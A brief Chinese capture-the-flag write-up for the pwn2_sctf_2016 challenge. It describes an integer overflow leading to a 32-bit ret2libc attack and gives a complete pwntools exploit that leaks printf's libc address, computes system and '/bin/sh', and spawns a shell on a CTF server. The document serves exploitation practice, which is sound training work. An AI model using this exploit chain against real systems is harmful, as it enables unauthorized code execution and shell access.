pwn | pwn2_sctf_2016

pwn | pwn2_sctf_2016

32位ret2libc + 整数溢出
题目给了syscall
但是找不到pop eax，没办法使。

exp如下：

from pwn import *
from LibcSearcher.LibcSearcher import *
import struct

context.log_level = 'debug'

elf = ELF('./pwn2_sctf_2016')
p_main = 0x0804852F
p_plt_printf = elf.plt['printf']
p_got_printf = elf.got['printf']


# p = process('./pwn2_sctf_2016')
p = remote('node4.buuoj.cn',27450)

p.recvuntil("read? ")

p.sendline(b'-1')

p.recvuntil("!\n")


# stack overflow

payload = b'A'*(0x2c+4) + p32(p_plt_printf) + p32(p_main) + p32(p_got_printf)

p.sendline(payload)

p.recvuntil('\n')

# recv leak addr
p_libc_printf = struct.unpack('<I', p.recv(4))[0]
libc = LibcSearcher('printf', p_libc_printf)
p_libc_base = p_libc_printf - libc.dump('printf')
p_libc_binsh = p_libc_base + libc.dump('str_bin_sh')
p_libc_system = p_libc_base + libc.dump('system')


p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('!\n')

payload = b'A'*(0x2c+4) + p32(p_libc_system) + p32(p_main) + p32(p_libc_binsh)
p.sendline(payload)


p.interactive()